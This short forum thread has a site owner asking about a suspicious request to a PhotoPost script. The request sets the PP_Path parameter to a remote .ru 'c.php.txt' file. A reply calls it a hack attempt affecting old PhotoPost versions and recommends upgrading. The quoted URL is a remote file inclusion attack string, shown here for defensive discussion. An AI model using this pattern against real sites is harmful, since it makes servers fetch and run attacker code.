Possible hacker?

I've just looked at my "who's online" to see a guest viewing the following url

http://"mydomain"/photopost/pp-inc?PP_Path=http://"dodgyurl".ru/c.php.txt?

is this a hack attempt trying to redirect people to a new url?
what do I need to do (if anything).

Yes it is someone trying to hack. It is only an issue if your Photopost is like 4.8 or below which is several years old. Your answer would be to upgrade to the 5.x series of photopost if your running an older copy
